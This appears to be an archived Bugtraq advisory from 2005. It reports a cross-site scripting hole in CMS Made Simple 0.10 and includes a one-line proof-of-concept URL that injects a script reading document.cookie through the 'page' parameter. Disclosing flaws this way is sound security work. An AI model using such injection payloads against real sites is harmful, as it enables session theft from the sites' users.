Bugtraq mailing list archives
CMS Made Simple 0.10 is susceptible to a cross site scripting attack.
From: X1ngBox () securityfocus com, Gmail () securityfocus com, COM () securityfocus com
Date: 26 Sep 2005 08:38:05 -0000
[Description]: CMS lets you update your pages and keep the content on a static page that will not become stale regardless of how much other content gets placed on your site [version]:CMS Made Simple 0.10 [vendor]:http://www.cmsmadesimple.org [Vulnerability]: cross site script [exploit]: http://[host]/[cms]/index.php?page=<script>alert(document.cookie);</script> .......[X1NG].......... X1ngBox <at/> Gmail Com
Current thread:
- CMS Made Simple 0.10 is susceptible to a cross site scripting attack. X1ngBox (Sep 27)